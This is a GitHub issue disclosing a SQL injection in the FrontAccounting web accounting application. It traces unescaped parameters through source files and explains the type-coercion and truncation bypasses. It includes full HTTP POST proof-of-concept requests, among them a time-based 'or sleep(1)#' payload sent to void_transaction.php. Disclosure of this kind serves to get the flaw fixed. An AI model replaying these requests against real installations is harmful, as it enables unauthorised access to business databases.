Skip to content

SQL Injection #38

Closed
Closed
@Ginnz

Description

@Ginnz

Sorry,This is my first time to chat with people in English.

Frontaccounting is using function db_escape() to escape value. But some variables do not use the function db_escape().
environment : docker mattrayner/lamp:latest-1604

0x00 Description

includes/db/class.reflines_db.inc:156
If I set parameter $reference like ‘XXXXXX\’. Single quotes can escape.And I can inject in parameter $type
image
includes/references.inc:365
image
admin/db/voiding_db.inc:127
image
admin/void_transaction.php:316
image
admin/void_transaction.php:352
image
So parameter $type can be controlled
How about parameter $reference?
image
image
get_systype_db_info()
image
After that I found some insert statements of table grn_batch.
purchasing/includes/db/grn_db.inc:170
image
purchasing/includes/db/grn_db.inc:99
image
purchasing/po_receive_items.php:254
image
image
So parameter $reference can be controlled

0x01 Bypass:

  1. PHP
    switch ($type)
    The variable $type like ‘25’in here is same as ‘+25dasdsadasda.
    image
    image
  2. Mysql
    Converting a string into an integer has some problems in mysql.
    image
    '25'= '25dasdasdasd'= '+25dasdasdasd'
    image
    String and integer can be added.
  3. Mysql has SQL Truncation problem so that ‘\’ can be truncated

0x02 POC:

Settings such as ‘001/2018\’ will report an error, but ‘001/2018\’ will not . I noticed that refererence is 60 bytes, set the payload to 61 bytes like 001100422222222222222222222201700422222222222222212222/2018\\.it is 001100422222222222222222222201700422222222222222212222/2018\ in the database.

I am using po_entry_items.php, not the po_receive_items.php found above.
image

POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3

supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463

database:
image
image
image

POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0

filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072

The final execution of the sql statement is like this:

SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions